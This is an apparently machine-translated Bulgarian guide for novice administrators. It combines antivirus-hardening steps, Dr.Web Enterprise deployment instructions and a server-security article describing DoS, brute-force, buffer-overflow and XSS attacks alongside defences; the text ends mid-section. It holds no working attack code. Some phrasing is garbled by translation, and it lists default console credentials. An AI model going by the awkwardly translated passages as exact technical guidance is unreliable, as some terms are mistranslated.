Процедурата за прилагане на антивирусна защита. Разработване, инсталиране и конфигуриране на индивидуална антивирусна система за вашата корпоративна стратегия за антивирусна защита
Статията е предназначена за начинаещи системни администратори.
Под антивирусна защита имам предвид защита срещу всякакъв вид зловреден софтуер: вируси, троянски коне, руут китове, задни вратички,...
1 Стъпка за антивирусна защита - инсталирайте антивирусен софтуер на всеки компютър в мрежата и го актуализирайте поне всеки ден. Правилната схема за актуализиране на антивирусни бази данни: 1-2 сървъра отиват за актуализации и разпространяват актуализации на всички компютри в мрежата. Не забравяйте да зададете парола, за да деактивирате защитата.
Антивирусният софтуер има много недостатъци. Основният недостатък е, че не хващат вируси, написани по поръчка и които не се използват широко. Вторият недостатък е, че натоварват процесора и заемат памет на компютрите, някои повече (Kaspersky), други по-малко (Eset Nod32), това трябва да се вземе предвид.
Инсталирането на антивирусен софтуер е задължителен, но недостатъчен начин за защита срещу вирусни епидемии, често сигнатурата на вируса се появява в антивирусните бази данни на следващия ден след разпространението му, за 1 ден вирусът може да парализира работата на всяка компютърна мрежа.
Обикновено системните администратори спират на стъпка 1, което е по-лошо, те не я завършват или не следват актуализациите и рано или късно инфекцията все още се появява. По-долу ще изброя други важни стъпки за укрепване на антивирусната защита.
Стъпка 2 Политика за пароли. Вирусите (троянски коне) могат да заразят компютрите в мрежата чрез отгатване на пароли за стандартни акаунти: root, admin, Administrator, Administrator. Винаги използвайте сложни пароли! За акаунти без пароли или с прости пароли, системният администратор трябва да бъде уволнен със съответния запис в трудовата книжка. След 10 неправилни опита за парола Сметкатрябва да бъде блокиран за 5 минути, за да се защити от груба сила (отгатване на парола чрез просто изброяване). Силно препоръчително е вградените администраторски акаунти да бъдат преименувани и деактивирани. Паролите трябва да се променят периодично.
3 стъпка. Ограничаване на потребителските права. Вирус (троян) се разпространява в мрежата от името на потребителя, който го е стартирал. Ако правата на потребителя са ограничени: няма достъп до други компютри, няма административни права на неговия компютър, тогава дори работещ вирус няма да може да зарази нищо. Не е необичайно самите системни администратори да станат виновници за разпространението на вируса: те стартираха admin key-gen и вирусът отиде да зарази всички компютри в мрежата ...
4 стъпка. Редовно инсталиране на актуализации за сигурност. Това е трудна работа, но трябва да се свърши. Трябва да актуализирате не само операционната система, но и всички приложения: СУБД, пощенски сървъри.
Стъпка 5 Ограничаване на пътищата за проникване на вируси. Вирусите влизат в локалната мрежа на предприятието по два начина: чрез преносими носители и през други мрежи (Интернет). Отказвайки достъп до USB, CD-DVD, вие напълно блокирате 1 начин. Ограничавайки достъпа до интернет, вие блокирате втория път. Този метод е много ефективен, но труден за изпълнение.
6 стъпка. Защитни стени (ITU), те също са защитни стени (защитни стени), те също са защитни стени. Те трябва да бъдат инсталирани на границите на мрежата. Ако вашият компютър е директно свързан към интернет, ITU трябва да е активиран. Ако компютърът е свързан само към локална мрежа(LAN) и има достъп до интернет и други мрежи чрез сървъри, не е необходимо да включвате ITU на този компютър.
Стъпка 7 Разделяне на корпоративна мрежа на подмрежи. Удобно е да разбиете мрежата според принципа: един отдел в една подмрежа, друг отдел в друга. Подмрежите могат да бъдат разделени на физическия слой (SCS), на слоя за връзка с данни (VLAN), на мрежовия слой (подмрежи, които не се пресичат от ip адреси).
Стъпка 8 Windows има прекрасен инструмент за управление на сигурността на големи групи компютри – това са групови политики (GPO). Чрез GPO можете да конфигурирате компютри и сървъри, така че заразяването и разпространението на зловреден софтуер да стане почти невъзможно.
Стъпка 9 Терминален достъп. Вдигнете 1-2 терминални сървъра в мрежата, чрез които потребителите ще имат достъп до интернет и вероятността от заразяване на персоналните им компютри ще падне до нула.
Стъпка 10 Проследяване на всички процеси и услуги, работещи на компютри и сървъри. Можете да направите така, че когато стартира непознат процес (услуга), системният администратор да бъде уведомен. Търговският софтуер, който може да направи това, струва много, но в някои случаи разходите са оправдани.
Кратки инструкции за разполагане на антивирусна мрежа:
1. Направете план за структурата на антивирусната мрежа, включително всички защитени компютри и мобилни устройства.
Изберете компютър, който ще изпълнява функциите на Dr.Web Server. Антивирусната мрежа може да включва няколко Dr.Web сървъра. Характеристиките на тази конфигурация са описани вРъководство на администратора, П. Характеристики на мрежа с няколко Dr.Web сървъра.
Dr.Web Server може да се инсталира на всеки компютър, не само на компютър, който функционира като LAN сървър. Основните изисквания към този компютър са дадени в стр.Системни изисквания. Една и съща версия на Dr.Web Agent е инсталирана на всички защитени станции, включително LAN сървъри. Разликата е в списъка с инсталирани антивирусни компоненти, определен от настройките на сървъра. |
За да инсталирате Dr.Web Server и Dr.Web Agent, е необходим еднократен достъп (физически или чрез средства за дистанционно управление и стартиране на програми) до съответните компютри. Всички допълнителни действия се извършват от работната станция на администратора на антивирусната мрежа (включително, евентуално извън локалната мрежа) и не изискват достъп до Dr.Web сървъри или работни станции.
2. Според плана определете кои продукти за кои операционни системи ще трябва да бъдат инсталирани на съответните мрежови възли. За подробна информация за предлаганите продукти вжСъдържание на доставката.
Всички необходими продукти могат да бъдат закупени като Dr.Web Enterprise Security Suite в кутия или изтеглени от уебсайта на Doctor Webhttps://download.drweb.ru/.
Dr.Web Агенти за станции под Android OS, Linux OS, OS X могат да бъдат инсталирани и от пакети за самостоятелни продукти и впоследствие свързани към централизирания Dr.Web сървър. Описание на съответните настройки на агентите е дадено вРъководство за инсталиране, П. Инсталиране на Dr.Web Agent чрез личен инсталационен пакет. |
3. Инсталирайте основния комплект за разпространение на Dr.Web Server на избрания компютър или компютри. Описание на инсталацията е дадено вРъководство за инсталиране, П. Инсталиране на Dr.Web сървър.
Заедно със сървъра се инсталира Dr.Web Security Control Center.
По подразбиране Dr.Web Server стартира автоматично след инсталация и след всяко рестартиране на операционната система.
4. Ако антивирусната мрежа ще включва защитени станции под Android OS, Linux OS, OS X, инсталирайте допълнителния пакет за разпространение на Dr.Web Server на всички компютри, на които е инсталиран основният пакет за разпространение на сървъра.
5. Ако е необходимо, инсталирайте и конфигурирайте прокси сървъра. Описанието е дадено вРъководство за инсталиране, П. Настройка на прокси сървъра.
6. За да конфигурирате Сървъра и антивирусния софтуер на станциите, трябва да се свържете със Сървъра с помощта на Dr.Web Security Control Center.
Контролният център е достъпен на адрес:
http://<Адрес_Сервера> :9080
или
https://<Адрес_Сервера> :9081
където като<Адрес_Сервера> посочете IP адреса или името на домейна на компютъра, на който е инсталиран Dr.Web Server.
Името на администратора по подразбиране еадминистратор
Парола:
за Windows OS, паролата, която е зададена по време на инсталирането на сървъра.
за ОС от фамилията UNIX -корен.
При успешно свързване към Сървъра ще се отвори главният прозорец на Центъра за управление ( Подробно описаниевиж вРъководство на администратора, в п. Център за контрол на сигурността Dr.Web).
7. Извършете първоначалната конфигурация на сървъра (за подробно описание на настройките на сървъра вижтеРъководство на администратора, В Глава 8: Конфигуриране на Dr.Web сървър):
а. В глава Мениджър на лицензидобавете един или повече лицензни ключовеи ги разпределете на съответните групи, по-специално на групатаВсеки . Тази стъпка е необходима, ако по време на инсталирането на сървъра не е зададен лицензен ключ.
b. В глава Обща конфигурация на хранилищетопосочете кои компоненти на антивирусната мрежа ще се актуализират от Dr.Web GUS. В главаСъстояние на хранилищетоактуализирайте продукти в сървърното хранилище. Актуализацията може да отнеме много време. Изчакайте процеса на актуализиране да завърши, преди да продължите с по-нататъшна конфигурация.
° С. На страницата Администриране → Dr.Web сървърпредоставя информация за версията на сървъра. В присъствието на нова версия, актуализирайте сървъра, както е описано вРъководство на администратора, П. Обновяване на Dr.Web сървър и възстановяване от резервно копие.
д. Коригирайте, ако е необходимоИнтернет връзказа промяна на мрежовите настройки по подразбиране, използвани за взаимодействие между всички компоненти на антивирусната мрежа.
д. Ако е необходимо, конфигурирайте списъка с администратори на сървъра. Налично е и външно удостоверяване на администраторите. За подробности вжРъководство на администратора, В Глава 5: Администратори на антивирусната мрежа.
f. Преди да стартирате работата на антивирусния софтуер, се препоръчва да промените настройката на критичната директория за архивиране на данни на сървъра (вж.Ръководство на администратора, П. Настройка на графика на сървъра Dr.Web). Желателно е тази директория да се постави на друг локален диск, за да се намали възможността от едновременна загуба на софтуерните файлове на сървъра и резервното копие.
8. Задайте настройките и конфигурацията на антивирусния софтуер за работни станции (за подробно описание на конфигурирането на групи и станции вижтеРъководство на администратора, В Глава 6И Глава 7):
а. Ако е необходимо, създайте потребителски групи от станции.
b. Задаване на групови настройкиВсеки и създадени потребителски групи. По-специално, конфигурирайте раздела за инсталирани компоненти.
9. Инсталирайте софтуера Dr.Web Agent на работни станции.
В глава Инсталационни файловепрочетете списъка с предоставените файлове за инсталиране на агента. Изберете опцията за инсталиране, която ви подхожда въз основа на операционната система на станцията, възможността за отдалечена инсталация, опцията за указване на настройките на сървъра при инсталиране на агента и др. Например:
Ако потребителите инсталират антивирусната програма сами, използвайте персонални инсталационни пакети, които се създават чрез Центъра за управление отделно за всяка станция. Този тип пакети могат да се изпращат и на потребителите на електронна пощадиректно от контролния център. След инсталирането станциите се свързват автоматично към сървъра.
За отдалечено инсталиране по мрежа към станция или няколко станции едновременно (само за станции под Windows OS), използвайте мрежовия инсталатор. Инсталацията се извършва чрез Центъра за управление с помощта на разширение на браузъра.
Възможно е също така да се инсталира дистанционно през мрежата към станция или няколко станции едновременно с помощта на услугата Active Directory. За да направите това, използвайте инсталатора на Dr.Web Agent за мрежи с Active Directory, доставен с пакета за разпространение на Dr.Web Enterprise Security Suite, но отделно от инсталатора на сървъра.
Ако е необходимо да се намали натоварването на комуникационния канал между сървъра и станциите по време на инсталацията, можете да използвате пълния инсталатор, който инсталира агента и компонентите за защита едновременно.
Инсталирането на станции под Android OS, Linux OS, OS X може да се извърши локално според общите правила. Също така, вече инсталиран самостоятелен продукт може да се свърже със сървъра въз основа на подходящата конфигурация.
10. Веднага след като бъдат инсталирани на компютри, Агентите автоматично установяват връзка със Сървъра. Упълномощаването на антивирусни станции на сървъра става в съответствие с политиката, която сте избрали (вижтеРъководство на администратора, П. Политика за свързване на станция):
а. При инсталиране от инсталационни пакети, както и при конфигуриране на автоматично потвърждение на Сървъра, работните станции се регистрират автоматично, когато се свържат със Сървъра за първи път и не е необходимо допълнително потвърждение.
b. При инсталиране от инсталатори и конфигуриране на потвърждение за ръчен достъп, администраторът трябва ръчно да одобри нови работни станции за тяхната регистрация на сървъра. В този случай новите работни станции не се свързват автоматично, а се поставят от Сървъра в групата на начинаещите.
11. След свързване към сървъра и получаване на настройките, съответният набор от компоненти на антивирусния пакет, посочени в настройките на основната група на станцията, се инсталира на станцията.
12. Конфигурирането на станции и антивирусен софтуер също е възможно след инсталирането (за подробно описание вижтеРъководство на администратора, В Глава 7).
В тази статия бих искал да събера някои видове атаки срещу сървъри и средства за защита на сървъра от хакери. Изписани са много книги и статии по темата за сигурността. Акцентът в тази статия е върху основните грешки на администраторите и решенията за отстраняването им. След като прочете тази статия и провери собствения си сървър, администраторът също няма да може да спи спокойно, може само да каже преминах "кандидат минимума".
Запомнете администраторите три поговорки,
Не! по-добре ги отпечатайте и ги закачете на работното си място пред очите си:
"Сигурността е процес",
"Когато администраторът няма какво да прави, той се занимава със сигурността",
"Сигурността се определя от най-слабото звено"
Статията е насочена към *nix + Apache + PHP + Perl + (MySQL | PostgreSQL) администратори и защита на сървъри от отдалечени атаки, за други администратори, надявам се статията да бъде храна за размисъл.
Различните книги имат различни класификации на хакерските атаки, аз ще представя собственото си разделение на два условни класа на ВСИЧКИ атаки, като ги разгрупирам:
- Атака срещу услуги, които са уязвими и достъпни през интернет
За да разберете моето разделение, представете си, че има измислен скрипт, който дистанционно атакува Apache на порт 80 и в резултат на атаката Apache се изключва и вие оставате без вашия сайт, тъй като няма кой да раздава уеб страници. На вашия сървър за електронна поща sendmail бяха изпратени 1000 знака вместо кратко потребителско име като параметър към VRFY, sendmail не очакваше това да се случи и затвори, оставяйки ви без поща. Общото значение на атаките от този условен клас е, че се използва известна уязвимост на приложението. И има три начина -
- path1) приложението ще се срине и услугата няма да бъде достъпна, DoS ситуация;
- път 2) приложението ще започне да улавя ресурси и след като ги изчерпи, ще направи DoS;
- path3) на приложението ще бъде подаден шелкод и кодът на атакуващия ще бъде изпълнен;
Това са всички атаки срещу услугата (точка 1) и те се третират само по един начин: администраторът своевременно научава от разработчика за наличието на уязвимост и актуализира тази програма.
Атаката по точка 2 е, когато динамична услуга, реализирана на някакъв език за програмиране, позволява получаване на параметри и ги изпълнява, без да ги проверява. Например, използвайки браузър, нападателят, обхождайки сайт на Apache, търси уязвимости в самия сайт и използвайки ги, получава това, което иска. Написан на Tcl, ботът за модериране на IRC сървърния канал получава заявки от потребителя (номер на нова шега, дата от деня за показване на времето) и хакера, пресъздавайки работата на програмния код на бот (обратно инженерство ), конструира заявки, които не са взети предвид от автора на бота.
Попитайте как е? тогава определено имате нужда от тази статия. По един или друг начин, точно отдолу всичко ще бъде боядисано.
Атака срещу уязвими услуги и самия сървър
В този раздел включих всички атаки, чието въздействие пада върху системата и услугите. Често такива атаки са възможни от грешки в изпълнението на програмата, като например препълване на буфер (buffer overflow). Накратко изглежда така, да кажем, че в лошо написан ftp сървър има масив (буфер) за потребителско име за определен брой символи (например 10) и такъв ftp сървър получава 100 знака от болен -wisher, ако такава ситуация не е в проверения код на ftp сървъра, възниква препълване на буфера.
И така, с какво е полезно препълването на локалния буфер за хакерите? Възможно е адресът за връщане да бъде презаписан със злонамерен код. Дистанционно, това ви позволява да изпълнявате произволен код на целевата система, локално, ако програмата работи като root, това ще ви позволи да получите привилегии на системен администратор.Кодът, който причинява препълване на буфера и изпълнява действия за хакер, се нарича shell код Писането на shellcode не е лесна задача и изисква познания по асемблер от хакера, което предполага професионализъм в тази област.
Защита срещу атаки на уязвими услуги и самия сървър
- Актуализация. Необходимо е да се научите как да актуализирате цялата система и следователно да можете
"изградете света и ядрото" за *nix, актуализирайте чрез пакетната система на Linux и можете да щракнете върху бутона Актуализиране в актуализация на windowsза лицензиран MS Windows. Администраторите на FreeBSD трябва да могат да инсталират софтуер чрез портове. По този начин ще плавате с разработчиците, а не срещу тях.Администраторите на MS Windows трябва да свикнат и да използват по-често формата за разпространение на MSI, който е силно препоръчан от Microsoft и поддържа актуализирането на стария пакет с новия. Каквото и да правите на вашия сървър, запитайте се дали има нова версия на тази програма, колко лесно е да я актуализирате? Трябва да създадете решение, върху което имате пълен контрол, да, има проекти със собствени разработки или корекции, но ако вашите разработки изискват замразяване на приложенията, от които се нуждаете на определена версия и не можете да приложите корекциите си към новата система - такова решение НЕ си струва!
Тук ще направя едно лирично отклонение и ще ви разкажа как трябваше да се пречупя. След като прочетете статии в интернет, които обикновено започват така, "изтеглете източника и го поставете, направете инсталиране". И така, какво следва? Как ще инсталирате новата версия? Да запазите старата версия, за да можете да направите (де|де)инсталиране в нея? И в новия make install пак? Тези въпроси бяха зададени от моя приятел Дмитрий Дубровин, когато започнахме да изучаваме FreeBSD. Започнах да разбирам, че той е прав и поне за Free, този път не е подходящ и като не следвах пътя на разработчиците на FreeBSD, само затрудних нещата за себе си.
Сега, след като усвоихте FreeBSD, когато няколко команди изтеглят нови източници за безплатното ядро и цялата система, след това няколко команди създават нов святи ядрото, а след това портовете и приложенията в системата се актуализират, започвате да разбирате силата на *nix системите. Трудно е да предадеш гордостта, която изпитваш, когато надстроиш сървър с FreeBSD от стар клон към текущия, изградиш отново света на системата, когато системата се компилира от нови източници (изглежда, сякаш Мюнхаузен се е дърпал за косата) и всичко който работеше преди ъпгрейда също работи "без файл".
Както вече разбрахте, трябва да се абонирате за пощенски списъци за сигурност от разработчиците на софтуера, който поддържа вашия бизнес, и да се актуализирате периодично. Обновяването на всичко и всичко трябва да бъде усъвършенствано и поставено на релси.
- Настройка на сигурността. Повечето сървърни операционни системи не идват достатъчно конфигурирани по подразбиране, за да работят в суровата "химическа" среда на Интернет. За да могат хакерите да „не мамят“ на вашия сървър, трябва да извършите настройка на сигурността, а именно да прочетете препоръките на производителя на операционната система относно сигурността. Администраторите на *nix системите могат да се обадят на man security и след като прочетат съветите на разработчиците, да направят приказката реалност. Но каквато и да е операционната система, трябва внимателно да тествате работата на сървъра и услугите след настройка на сигурността.
- защитна стена. Конфигурирана защитна стена, която лично сте проверили с помощта на скенери за портове на nmap и скенери за уязвимости, ако има изход от тези програми, всички ли разбирате какво е заложено? Когато настройвате защитна стена, не забравяйте, че има начини да заобиколите нейните правила. Например, има локална мрежа, защитена от защитна стена, като зададете флага за забрана на фрагментирането на пакети, е възможно в определени ситуации да достигнете до местоназначението в локалната мрежа. Или често срещана грешка на администратора, прекомерно доверие в изходящите пакети на собствения му сървър.
Представете си реална ситуация, вражеският код се опитва да инициира връзка с хоста на хакера-собственик и имате правило в защитната стена „всичко е разрешено от мен до Интернет“. Когато съставяте правила за защитна стена, трябва да разберете напълно цялата картина на мрежовата комуникация на вашите услуги между тях и отдалечени клиенти.
- Система за откриване на проникване. Защитната стена може да си представим като каменни стени близо до рицарски замък. Поставя се веднъж и седи вътре - сухо и удобно. Но какво ще стане, ако някой вече тества здравината на стените от оръдието? Може би вече трябва да погледнете от замъка и да се натрупате върху някого? За да знаете какво се случва зад стените на замъка, тези отвън, трябва да имате система за откриване на проникване (IDS) на сървъра. Ако имате такава система, базирана на пакета, който харесвате, тогава ако някой започне да стреля от пистолета на nmap, тогава вие ще сте наясно и нападателят също ще е наясно с „какво знаете“.
- Анализ на нестандартни ситуации. В многобройни регистрационни файлове в системата често мигат надписите "грешка: не е отворен файл /etc/passwd" или "достъпът е отказан". Това са малки звънчета, които звънят за неправилно конфигурирано приложение, което не може да прочете нещо, някъде, или може би това не е звънец, а аларма, която алармира за хакер, който е на половината път.
Във всеки случай администраторът трябва да е наясно с подобни неща. За да се улесни работата на администратора, са създадени програми, които ще анализират регистрационните файлове за появата на интересни фрази и ще изпращат отчет до администратора по пощата. Не пренебрегвайте такава възможност, такива програми са сравними с пазачи, които проверяват по доверен път, но всеки ли се държи, както е предписано?
- Премахнете софтуерните версии. Премахнете банери от вашите услуги. Не, не онези банери, които показвате на вашия сайт, а онези редове, които вашите програми издават като поздрави при свързване или при извеждане на грешки. Няма нужда да блестите с версии на вашите програми, хакерите търсят в интернет налични програми, които използват тази или онази уязвимост (експлоатират - експлоатират) по версии.
Тук няма едно решение, например, ако инсталирате определена програма от портовете, тогава не пишете make install clean, така че без вас всичко ще бъде изтеглено, компилирано и инсталирано. По-добре направете извличане; направете екстракт; след това отидете в поддиректорията files и там можете да коригирате версията на програмата в източниците или да я прехвърлите като друга и след това само да направите инсталацията чиста.
Apache е много информативен не на място и все още блести със системни версии, PHP, Perl, OpenSSL. Позорът е деактивиран чрез указване на директиви в httpd.conf ServerSignature Off ServerTokens Prod. В интернет можете да намерите помощ за подмяна на банери с всяка програма. Целта е същата – нападателят да бъде лишен от ценна информация. Разглеждайки списъка си с услуги, достъпни от Интернет, запитайте се дали не дава твърде много информация за себе си и информацията, която съхранява.
Например обвързването на DNS сървъра може да позволи „прехвърляне на зона“ и вашите компютри с техните IP и имена на домейни ще бъдат достъпни за всички, което е лошо. Проверете вашия сървър с различни скенери и внимателно прочетете техните резултати. Когато сменяте банера на програмата, съветвам ви да вмъкнете не произволен текст, а предупреждение за отговорност и че действията се регистрират. Тъй като имаше инциденти, когато хакер беше пуснат в съдебната зала, защото на хакнатия FTP сървър имаше надпис "Добре дошли! Добре дошли!".
- Правилото за минимално изискване. Минимизирайте наличните услуги за Интернет. Деактивирайте това, от което не се нуждаете, тъй като не можете да хакнете това, което е деактивирано. Често срещана грешка например е, когато MySQL сървър, сдвоен с Apache на същата машина, е конфигуриран да бъде достъпен дистанционно на своя порт по подразбиране 3306. Защо? Дайте командата netstat -na | grep СЛУШАЙТЕ и си дайте отговора: знаете ли кои програми използват кой интерфейс и кой порт? Вие контролирате ли? Е, ако е така.
- Много силни и различни пароли. Често във видеоклипове за хакване или истории на хакери за хакване мига фразата „добре, че администраторът имаше една парола за админ панела, която също отиде до ssh и ftp“. Надявам се, че това не е за вас. Оттук и правилото: паролите за различните услуги трябва да са различни и с дължина най-малко 16 знака. Оставете ги да бъдат записани на лист хартия, ако се страхувате да забравите (на това място специалистите по сигурността ме убиват), но това е по-добре, отколкото паролата ви да бъде декриптирана за няколко минути от отдалечен нападател, тъй като малката дължина на паролата и сходството с речникова дума направиха това възможно.
Различните пароли за различни услуги са лесни за правене, ако услугите ще се оторизират не като системни потребители в базата данни /etc/passwd, а като виртуални в техните собствени планарни или СУБД бази данни. Не съхранявайте пароли на сървъри във файла password.txt за всички ресурси, до които вие като администратор имате достъп.
- Ограничение. Всички ваши услуги на сървъра трябва да се изпълняват от различни ограничени акаунти (акаунт) и никога да не се изпълняват от основния акаунт. Повярвайте ми, ако стигнат до ескалация на привилегии от ограничен акаунт до root статус (uid=0, gid=0), ще бъдете спасени от липсата на известни дупки в актуализираната ви система.
Между другото, много администратори забравят такова нещо, защо например акаунтите за стартиране на Apache и MySQL трябва да имат достъп до обвивката! В края на краищата това може да бъде деактивирано и вместо shell да се посочи /bin/false. Е, честно казано, проверете акаунтите си за програми на вашия сървър за отчитане и ми кажете, ако греша. Във вашите SQL бази данни ограничете акаунтите до минималните необходими привилегии. Не давайте привилегии на FILE, когато се извиква само SELECT.
- Всички в затвора!Научете как да работите с пясъчни кутии (sandbox) или затвори (jail) и да стартирате приложения в тези изолирани стаи, това ще затрудни хакването на целия сървър. Ако използвате виртуализация, тогава можете да разпространявате услуги в различни гост операционни системи.
- Послойна защита.Възможно е да забраните нещо по няколко начина на различни места - направете го. НИКОГА не мислете - аз го забраних тук, там да забраня излишното.
Научете повече за атаките срещу уязвими услуги и самия сървър.
- DoS атака (Denial of Service) - атака, чиято цел е да убие всеки ограничен ресурс на сървъра (интернет канал, RAM, процесор и т.н. и т.н.), така че сървърът да не може да обслужва законни потребители. Образно казано, представете си, че натрапник ви се е обадил вкъщи и е мълчал по телефона, и това продължава цяла вечер. Омръзнало ви е всичко това и сте изключили телефона, а на сутринта сте разбрали, че сте пропуснали важно обаждане от шефа си. Ето една аналогия от Истински живот DoS атаки.
В реалния живот DoS често изглежда така, поради грешка в програмата, използването на процесора скача и остава на 100% за дълго време, а нападателят периодично използва тази дупка в програмата. Лошо написано приложение може да изчерпи RAM. Или "пощенска бомба" под формата на силно компресиран файл в архива с много символи [интервал], който ще бъде разопакован за проверка от антивирусната програма и разопакованият огромен файл ще препълни дяла на твърдия диск на сървъра и / и накара сървъра да се рестартира.
Защита от DoS атаки:
- Актуализиране на програма, която се манипулира за DoS атака
- Задайте квоти за ресурси за акаунта, под който се изпълнява тази програма. *nix системите ви позволяват да регулирате процента на използване на процесора, RAM, броя на създадените процеси, отворените файлове и т.н. и така нататък.
- Настройте влизане в програмата и се опитайте да намерите нападателя-кукловод и да го блокирате в защитната стена.
- Настройте програмата според съветите на разработчика, гуруто, според статиите в Интернет, ако се окажете в такава ситуация.
- DDoS (същият DoS, но вие сте атакувани от няколко зомби компютъра, водени от
нападател). DDoS е разрушителен и се използва само от онези вандали, които имат стада от зомби машини и ще искат пари, за да спрат атаката или да навредят на вашия бизнес, така че потребителите, без да достигнат до вашия сървър, да отидат при конкурент. DDoS атаките не се използват от хакери, чиято цел е интелектуално да хакнат вашия сървър, да, да, вашият сървър е "мистерия", която те искат да "разрешат".Как да се предпазите от DDoS? Ако разчитате на собствените си сили и средства, тогава чрез автоматизиране на работата на скриптове можете да извадите IP адреси от различни регистрационни файлове и да ги въведете в забранителните правила на защитната стена. Така, например, авторът на статията „Има ли живот под DDoS?“ публикува много статии за това как да го конфигурирате, за да минимизирате щетите от DDoS.
Защита срещу DDoS атаки:
- Ако DDoS е насочен към приложението, опитайте се да намерите в регистрационните файлове разликата между нападателите и законните потребители и като автоматизирате със скрипт, въведете го в правилата на защитната стена в deny
- Ако DDoS е насочен към системата (например атака през ICMP протокола), чрез автоматизиране със скрипт, добавете го към правилата на защитната стена в deny
- Задайте квоти за ресурси за акаунта, под който се изпълнява тази програма. * nix системите ви позволяват да конфигурирате процента на използване на процесора, RAM, броя на създадените процеси, отворените файлове и т.н.
- Настройте програмата според съветите на разработчика, гуруто, според статии в Интернет, ако се окажете в такава ситуация
- Свържете се с вашия доставчик нагоре по веригата, за да помогне по какъвто и да е начин. Напишете жалба на [имейл защитен]хост_на_мрежи_от_атака.домейн. Това ще помогне частично да унищожи мрежата на нападателя, да го остави да понесе щети, струва му пари. Изпитайте морално удовлетворение.
- Вижте mod_security за Apache, това е чудесен инструмент, който ще ви помогне в някои ситуации.
- Bruteforce атака с парола. Тук дупките в програмите не са виновни, те просто грубо избират двойка вход / парола. Тези, които са напуснали сървъра с конфигуриран ssh, но са забравили да ограничат достъпа чрез ssh от определени IP адреси и с определени влизания (директива в ssh_config AllowUser), трябва да са видели в регистрационните файлове опити за брутална парола mash:password_machine.
Bruteforce защита с парола:
- Ограничете броя на неуспешните опити за влизане/парола
- Ако приложението позволява, настройте увеличаване на времето преди нов опит за влизане / парола.
- Ако тесен кръг от хора трябва да работи с приложението, създайте такова правило и го ограничете до
Атака чрез динамичното съдържание на услугата
Този тип атака често се случва на куп Apache + (PHP | PERL) + (MySQL | PostgreSQL) за света на *nix и IIS + ASP + Microsoft SQL Server за света на MS Windows с помощта на прост браузър, но това е само специален случай, който просто се използва по-често поради популярността на мрежата. В този пакет езиците за програмиране са ASP, PHP, Perl, SQL, така че те често ще бъдат използвани от хакери за компилиране на техните разрушителни проекти.
НО най-важното нещо, което трябва да разберете, е, че такива връзки услуга + динамично съдържание върху тяхима много в езиците за програмиране и следователно всички те са под оръжието на хакерите. Ето например непълен списък:
- Уеб сървър + CGI скриптове
- Древна връзка, която вече не се използва - Apache + PHF (а именно P H F) скриптове
- IIS + ColdFusion сървър за приложения
- SSI механизъм (включва от страната на сървъра)
След това ще говорим най-вече за уеб хакове, но не забравяйте, че всичко описано по-долу е вярно за други пакети услуги + динамично съдържание. Думите са различни, но същността е една. Днес хакерите атакуват мрежата с браузъра, утре с клиента R срещу услугата Z. Уеб сървърът, сам по себе си свързан с бази данни и множество езици за програмиране, се превърна в платформа за атаки от този вид.
Смисълът на всички атаки от този вид е да се опитате да проверите сайта с помощта на браузър, за да откриете грешки в скриптове, които обслужват динамичното съдържание (контент) на сайта.
Оттук и изводът - хакване на сайт чрез атака в мрежата, в който има само статични html страници, които само препращат една към друга, е НЕВЪЗМОЖНО. Атаките през вашия уеб сайт се появиха, когато хората искаха повече интерактивност и я добавиха чрез езици за програмиране и бази данни.
Хакери, сърфиращи в уебсайтове Специално вниманиеотнасят се до скриптове, на които е предаден параметър. Но какво ще стане, ако авторът на скрипта не провери какво точно се предава като стойност на параметъра?
Общи решения за администратора срещу атаки върху динамичното съдържание на услугата (уеб сайт като специален случай)
- Актуализация. Вече говорихме за това, но ако използвате разработки на трети страни (двигатели на форуми, галерии, чатове и т.н.), тогава ще получавате доклади за уязвимости и дупки за корекции. Мнението на хакерите е, че ако порталът работи с финанси и техния оборот, тогава не е желателно в такъв портал да има чужди разработки, освен техните собствени. Разбира се, разбира се, че разработването на техните собствени двигатели за сайта е написано от програмисти, които знаят как да програмират безопасно и имат разбиране за заплахите в Интернет.
- Бъдете нестандартни. В много помощни програми за хакери, базите данни за уязвимости, пътеките на форума/, галерията/, изображенията/ често мигат. Много удобно! Познайте админа, половината от тях ще се бръснат и плюят по сайта ви, когато сайтът ви не се намира на /usr/www, а администраторът ви не е site.com/admin. Изводът е, че ако не сте стандартен, това е допълнителна спица в колелата на хакер, който атакува вашия сайт. Той ще трябва да добави / коригира в ръчната база данни / скрипт. Но дали хакерът винаги може или желае да го направи? Младите хакери "script kiddies" определено ще бъдат уплашени. Например съвети за сигурност на PHP
# Направете PHP кода да изглежда като другите видове код
AddType application/x-httpd-php .asp .py .pl
# Направете PHP кода да изглежда като кодове от непознат тип
AddType приложение/x-httpd-php .bop .foo .133t
# Направете PHP кода да изглежда като html
AddType application/x-httpd-php .html .htmТази форма на сигурност за PHP чрез скриване има малко недостатъци на ниска цена. Самите хакери, описвайки своите хакове, пишат, че изтеглят същия софтуер, който се намира на вашия сървър от сайта на програмиста, и гледат с какви имена на таблици / пътеки / по подразбиране работи този или онзи двигател. Общият смисъл на нестандартното е да забави процеса на хакване, така че хакерът да няма "блицкриг" и колкото повече се дърпа, толкова по-вероятно е да бъде открит.
- Премахване на версии на двигатели и скриптове на сайта. Това е ценна информация, от която нападателят трябва да се лиши, знаейки версията, която търси готови решения за хакване. Направете го така, че вашите скриптове да не показват грешки върху грешки полезна информация, като например: пътя до скрипта, където е възникнала грешката (проблемът с „разкриването на пътя“) и изхода на самата грешка.
- Помислете за необходимостта от .htaccess. Наличието на .htaccess файлове означава, че можете да отмените вашите опции, зададени в основната конфигурация на Apache, повярвайте ми, хакерите ще направят точно това. Ако деактивирате използването на .htaccess с директивата „AllowOverride None“, тогава ще получите предимство в производителността за Apache, тъй като той няма да преглежда всички директории по пътя към уеб страницата при всяка заявка и ще увеличи сигурността на уеб сървъра на Apache.
Повече за атаките срещу динамично съдържание (уеб сайт като специален случай)
- XSS (Cross Site Scripting).
Скриптирането между сайтове се нарича XSS, а не CSS, тъй като CSS е ранен акроним за „Cascading Style Sheets“. XSS атаките не са насочени срещу сървъра, а срещу потребителите на този сървър. Но администраторът няма нужда да се радва! XSS атаката изглежда така, сайтът има редактируеми полета на уеб страницата или параметри на скрипта, които не са филтрирани при изграждането на формуляра<, >, javascript.Хакерът добавя код на езика за програмиране от страна на клиента, обикновено Java и VBScript, към редактируемите полета и този код става част от HTML страницата. Когато потребител посети такава страница, неговият браузър анализира страницата и изпълнява този код.
